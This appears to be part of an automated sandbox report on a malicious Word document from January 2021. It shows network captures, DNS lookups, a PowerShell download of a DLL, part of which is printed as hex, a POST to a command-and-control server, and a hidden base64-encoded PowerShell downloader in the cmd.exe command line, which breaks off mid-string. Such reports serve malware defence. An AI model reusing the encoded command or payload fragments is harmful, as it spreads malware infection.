Jan 8, 2021 18:11:10.095745087 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095781088 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095793009 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095834970 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095863104 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095873117 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095911980 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095937014 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095940113 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.096003056 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.097476959 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.401995897 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:26.387862921 CET	49168	80	192.168.2.22	184.66.18.83
Jan 8, 2021 18:11:29.396919966 CET	49168	80	192.168.2.22	184.66.18.83
Jan 8, 2021 18:11:37.916634083 CET	49169	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:11:40.926368952 CET	49169	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:11:46.933046103 CET	49169	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:11:58.947993040 CET	49170	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:12:01.957180977 CET	49170	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:12:07.963515043 CET	49170	80	192.168.2.22	202.187.222.40
Jan 8, 2021 18:12:25.548558950 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:25.744184017 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:25.744471073 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:25.746685028 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:25.746743917 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:25.942071915 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:25.942114115 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:25.942365885 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:26.137742043 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.137787104 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.137995958 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:26.333545923 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.981794119 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.981843948 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.981870890 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:26.982016087 CET	49171	443	192.168.2.22	167.71.148.58
Jan 8, 2021 18:12:29.981290102 CET	443	49171	167.71.148.58	192.168.2.22
Jan 8, 2021 18:12:29.981549978 CET	49171	443	192.168.2.22	167.71.148.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 18:11:08.569987059 CET	52197	53	192.168.2.22	8.8.8.8
Jan 8, 2021 18:11:08.637545109 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 8, 2021 18:11:08.569987059 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	paulscomputing.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 8, 2021 18:11:08.637545109 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	paulscomputing.com		216.218.207.98	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

paulscomputing.com

167.71.148.58

167.71.148.58:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	216.218.207.98	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2021 18:11:08.848408937 CET	0	OUT	GET /CraigsMagicSquare/H/ HTTP/1.1 Host: paulscomputing.com Connection: Keep-Alive
Jan 8, 2021 18:11:09.140847921 CET	1	IN	HTTP/1.1 200 OK Date: Fri, 08 Jan 2021 17:11:08 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 08 Jan 2021 17:11:09 GMT Content-Disposition: attachment; filename="yERd2O.dll" Content-Transfer-Encoding: binary Set-Cookie: 5ff8922d0ef64=1610125869; expires=Fri, 08-Jan-2021 17:12:09 GMT; Max-Age=60; path=/ Last-Modified: Fri, 08 Jan 2021 17:11:09 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 31 66 34 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 93 4c 43 1d f2 22 10 1d f2 22 10 1d f2 22 10 03 a0 b7 10 0f f2 22 10 03 a0 a1 10 61 f2 22 10 1d f2 23 10 64 f2 22 10 3a 34 59 10 1a f2 22 10 03 a0 a6 10 25 f2 22 10 03 a0 b0 10 1c f2 22 10 03 a0 b6 10 1c f2 22 10 03 a0 b3 10 1c f2 22 10 52 69 63 68 1d f2 22 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 48 e2 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 4a 01 00 00 58 02 00 00 00 00 00 75 7a 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 97 a2 04 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 a7 01 00 49 00 00 00 ac 9f 01 00 3c 00 00 00 00 f0 01 00 fc d5 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 d4 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 77 48 01 00 00 10 00 00 00 4a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b9 47 00 00 00 60 01 00 00 48 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 32 00 00 00 b0 01 00 00 16 00 00 00 96 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 fc d5 01 00 00 f0 01 00 00 d6 01 00 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0a 23 00 00 00 d0 03 00 00 24 00 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1f40MZ@!L!This program cannot be run in DOS mode.$YLC""""a"#d":4Y"%""""Rich"PELH_!JXuz`pI<@`\.textwHJ `.rdataG`HN@@.data2@.rsrc@@.reloc#$@B
Jan 8, 2021 18:11:09.140904903 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: bZV
Jan 8, 2021 18:11:09.140934944 CET	4	IN	Data Raw: 00 00 89 46 14 88 46 04 5e c3 cc cc cc cc cc cc cc cc cc cc 53 8b 5c 24 08 56 8b f1 83 fb fe 76 05 e8 9b 33 00 00 8b 46 18 3b c3 73 19 8b 46 14 50 53 8b ce e8 6b fe ff ff 33 c9 3b cb 1b c0 5e f7 d8 5b c2 08 00 80 7c 24 10 00 74 52 83 fb 10 73 4d Data Ascii: FF^S\$Vv3F;sFPSk3;^[\|$tRsMW~;sr!FU(vWUjPTUV]~F3D>;_^[u ^rv3;^[3;^[SUl$VW\|$9}s3E\$
Jan 8, 2021 18:11:09.140964985 CET	5	IN	Data Raw: 00 cc cc cc cc cc cc cc cc cc 6a ff 68 a8 52 01 10 64 a1 00 00 00 00 50 51 56 a1 b4 b6 01 10 33 c4 50 8d 44 24 0c 64 a3 00 00 00 00 8b f1 89 74 24 08 e8 e4 4f 00 00 33 c0 8d 4e 0c c7 06 44 62 01 10 6a ff 89 41 14 c7 41 18 0f 00 00 00 50 89 44 24 Data Ascii: jhRdPQV3PD$dt$O3NDbjAAPD$AD$$PJL$dY^VDb~$rFPiQ3F$F F^MPVDb~$rFP)Q3F$F FPD$tV
Jan 8, 2021 18:11:09.141005993 CET	7	IN	Data Raw: 37 29 00 00 8b 16 8b 42 04 03 c6 83 78 08 00 c7 44 24 18 00 00 00 00 75 0e 8b 40 2c 85 c0 74 07 8b c8 e8 49 ff ff ff 8b 0e 8b 51 04 83 7c 32 08 00 0f 94 c0 88 47 04 8b c7 8b 4c 24 10 64 89 0d 00 00 00 00 59 5f 5e 83 c4 10 c2 04 00 cc cc cc 55 8b Data Ascii: 7)BxD$u@,tIQ\|2GL$dY_^UjhSdPQSVW3PEdePDEtMdY_^[]ajhSdPQV3PD$dt$D$(u`
Jan 8, 2021 18:11:09.141042948 CET	8	IN	Data Raw: c8 04 6a 00 50 e8 3c f8 ff ff 8b 4c 24 14 8b 44 24 1c 8b 35 70 c4 01 10 8b d1 2b 15 60 b0 01 10 41 03 c2 0f b6 54 24 11 8a 14 32 30 10 3b 4c 24 20 89 4c 24 14 0f 8c 1b ff ff ff 8a 4c 24 12 8b 44 24 24 8a 54 24 13 5f 5e 5d 5b 88 50 01 88 08 83 c4 Data Ascii: jP<L$D$5p+`AT$20;L$ L$L$D$$T$_^][PX3$TSUVW3jhc$P\$$\$D$,D$0UD$4$h$d$TYjhb$$$$1jhb$
Jan 8, 2021 18:11:09.141083002 CET	9	IN	Data Raw: 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff Data Ascii: SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Jan 8, 2021 18:11:09.141129971 CET	10	IN	Data Raw: 31 66 34 30 0d 0a 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 Data Ascii: 1f40SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Jan 8, 2021 18:11:09.141172886 CET	11	IN	Data Raw: 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff Data Ascii: SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Jan 8, 2021 18:11:09.141208887 CET	13	IN	Data Raw: d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 53 ff d6 53 Data Ascii: SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Jan 8, 2021 18:11:09.330950975 CET	14	IN	Data Raw: 10 8b 94 24 f8 00 00 00 52 e8 9b 30 00 00 83 c4 04 89 ac 24 0c 01 00 00 89 9c 24 08 01 00 00 88 9c 24 f8 00 00 00 39 bc 24 80 00 00 00 72 0d 8b 44 24 6c 50 e8 70 30 00 00 83 c4 04 89 ac 24 80 00 00 00 89 5c 24 7c 88 5c 24 6c 39 bc 24 d4 00 00 00 Data Ascii: $R0$$$9$rD$lPp0$\$\|\$l9$r$QH0$$$9$Dr$0R0$D$@$09$r$P/$$$9$r$Q/$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49171	167.71.148.58	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2021 18:12:25.746685028 CET	251	OUT	POST /7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ HTTP/1.1 DNT: 0 Referer: 167.71.148.58/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ Content-Type: multipart/form-data; boundary=-----------------------cs0BVrSncg9DYPKmcW5iNvL User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 167.71.148.58:443 Content-Length: 7956 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2021 18:12:26.981794119 CET	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 08 Jan 2021 17:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 63 34 0d 0a 0c 45 01 41 71 ba ff f8 cd 75 62 2a bb 05 3e b4 3b fb e5 31 72 55 e8 fa ed cb e2 52 01 f9 b5 04 76 42 2f 28 fb f1 52 d4 fc 62 52 89 bb f7 1a 46 ee b6 00 9d f4 b8 59 b0 8e de f5 35 cf 04 79 33 36 59 b7 6b da 41 d4 33 59 70 5e 3d 69 6e 5c d4 20 68 aa 02 9d 1c 6c 40 01 24 5f 44 79 32 fb cb c2 62 52 4a ea be 86 cf 92 be 8f f4 6d ef 72 ab 35 f5 d1 94 6e 32 30 0f 02 21 93 9c 14 0a 1d 66 22 a5 8f 89 d9 73 fc 6f a8 8d 74 3b 57 df 03 e6 ab e3 ef e7 87 80 83 a5 7f b5 90 1e 6f 0c 6a cc 67 8b 40 17 bb d1 f3 e7 fc 06 b4 79 17 56 7c 26 dd 72 1d 70 fd 60 f0 54 c7 f6 56 b1 f2 16 c6 86 9b ab 7e 23 2f 08 c5 66 83 d9 71 22 04 46 b7 2d ee 2a 70 45 1d 15 39 d0 e6 ba 05 6d 52 69 d3 0b c8 3b 0e e6 4e d6 3a 63 ce 93 7e f0 ef 2f 00 a0 98 c9 52 5c ab 83 95 96 2a ab 93 7e 0e a8 89 3b 21 dd a2 9f 83 dc 77 35 be 03 4c d1 c5 57 50 1c 68 d7 56 47 ad 13 8b 70 6e eb d6 92 57 2e 0c 31 71 34 3f 2d f2 60 17 44 8a 92 10 4e 89 26 ad a2 fb a6 ee db 6a cd 34 a4 5b cb e2 98 42 dd 78 55 39 cf 60 0c 83 d0 26 87 f2 90 92 7e 01 0b 98 46 ed 7c 55 10 a5 6f 6b 8a 95 68 81 0d 42 39 b6 db e6 82 18 03 5c 76 85 0a 58 1b 04 51 8e 84 42 b4 78 f9 65 ba 4f c3 49 ec 39 0c cb b3 02 a5 37 10 ef 4d 3f c6 1f cd bd ad a6 f8 23 2b 9c 4e 0f 9e 35 29 9f c6 20 50 21 b8 ae d8 ed 27 a1 19 6c f0 d9 40 d1 36 ac f2 c0 f5 9d 2e 55 b8 6f bf 7b 02 5f 1a 46 48 cb 25 61 d5 52 68 ba 8e 32 ce fa 6c 6a c3 e9 de 03 a6 00 d3 77 e2 af 03 88 33 77 04 55 97 b9 5a f7 83 7f aa 7e 50 67 db 55 ac 1d 1d b3 97 69 ef a3 3f 34 1b 81 a6 27 dd f1 82 43 4e 0d 5e 75 a5 49 1a 70 54 4e ec 82 79 be 23 85 ae e6 f6 0e 82 5f 2c eb e2 fc 97 00 00 f8 80 36 c3 a5 9f 30 7e 77 d9 f3 88 55 0b 37 13 b2 1b 7f f0 60 0b b9 a4 65 f4 ce 38 92 4c 06 e5 7f 95 a0 55 55 a3 d8 cd 6e 33 48 d8 30 9c 1b b4 34 67 99 e6 06 f5 f6 04 7d f4 1c 8e f6 fe 82 57 b8 b7 4a 8c 14 3f ca 24 f6 97 8f 38 1c d2 7f 5f 94 fe 98 59 f3 eb 55 72 40 f9 e6 7b 59 ec 68 17 60 c0 17 ab d5 e1 b1 c0 0f 9d 27 0b 4d 7a 50 ad 67 9f be a5 18 ef fe 1b 83 8e 9a 0a 38 1b ac 33 c3 7c 40 e8 6d ed 34 2e 4c 49 52 79 f7 5c db 46 94 e4 fa 9c c5 52 dd 35 cf 7e 67 3f 12 7c d1 aa e2 3f 59 63 9a 9a dc f3 25 cb 89 dc 97 8b 37 56 30 dd 53 53 ed 36 f4 8a e3 f1 2c 0e 19 24 92 f2 ea 21 b3 68 3c 4c 35 52 70 aa 0a 1c 8a fa db 20 6b 95 45 de 25 38 0c c1 d1 c6 eb 20 00 e8 30 48 17 e5 9f c8 2e 68 a6 52 8f b5 0c 28 eb 7c 8a cc 93 70 ce 39 cf d5 4d 6c 51 e3 b3 41 74 a5 1c 15 5a ba 0e 1e d5 e3 86 b9 a0 14 0f 70 65 fd dc ac 7a 87 ed 76 1d d9 a4 26 84 db 04 6f 4c 36 2f a4 c1 5f e8 9f 1f 34 6d 31 2d 05 8a af 22 21 e4 7d af da da 15 3d 46 2e d1 3c 3b b3 a9 6f 3a 21 87 1e ea fc e3 d6 19 f1 8f 87 9e fd df c3 27 e6 61 02 ab 10 77 c7 8d 59 d7 b7 3a 75 ba a6 26 1d e2 e1 7c 86 94 1b 1e 74 f8 80 a2 78 1e 96 50 b9 80 09 d3 5e 8e d4 d9 07 10 fe 67 86 7e 78 44 15 cf f0 85 e3 8d c3 8c 69 0f 78 67 9d 88 bc 34 b4 18 38 70 d7 45 c4 35 12 e3 9d f6 1a c9 9f da 96 82 05 88 15 62 8b 5a 23 b2 b3 2a 21 81 49 36 c7 b2 97 d6 58 e1 cc 50 90 bd 0b 94 c5 1b e1 38 13 a7 3f ad 6d a8 03 ef 86 b3 45 18 8d 2f d0 50 21 a9 a0 e9 1b 29 0a ab e9 e8 bb 9b aa 56 8d 82 1f d8 8e 20 d8 e1 44 a3 c6 bd 34 1c 1b 8a 53 63 68 ec 1d 90 ca 66 95 b0 a6 d5 a9 68 56 23 6e 28 b3 57 90 50 cc e1 3f 07 14 ed 5e b4 55 d9 2a 40 bb 20 69 f2 92 93 2c fa b7 1b 4b c1 89 bc d9 75 86 a6 6d 49 5a a4 d0 f5 1a d1 a1 b7 80 04 42 d3 2f 98 4d 83 6c 72 f7 76 59 77 58 c0 45 7b 75 82 00 8e a5 1b 56 b2 d2 6e 93 08 39 c1 cc 0a 19 01 04 04 05 1c fc a0 55 fa 66 7d 2e 04 5a c7 5a a7 7e 9f 7a 97 12 b9 af 40 9f c6 85 2a bd de cb c2 f3 Data Ascii: 6c4EAqub>;1rURvB/(RbRFY5y36YkA3Yp^=in\ hl@$_Dy2bRJmr5n20!f"sot;Wojg@yV\|&rp`TV~#/fq"F-pE9mRi;N:c~/R\~;!w5LWPhVGpnW.1q4?-`DN&j4[BxU9`&~F\|UokhB9\vXQBxeOI97M?#+N5) P!'l@6.Uo{_FH%aRh2ljw3wUZ~PgUi?4'CN^uIpTNy#_,60~wU7`e8LUUn3H04g}WJ?$8_YUr@{Yh`'MzPg83\|@m4.LIRy\FR5~g?\|?Yc%7V0SS6,$!h<L5Rp kE%8 0H.hR(\|p9MlQAtZpezv&oL6/_4m1-"!}=F.<;o:!'awY:u&\|txP^g~xDixg48pE5bZ#!I6XP8?mE/P!)V D4SchfhV#n(WP?^U@ i,KumIZB/MlrvYwXE{uVn9Uf}.ZZ~z@

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2188 Parent PID: 584

General

Start time:	18:10:34
Start date:	08/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f600000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 592 Parent PID: 1220

General

Start time:	18:10:38
Start date:	08/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACk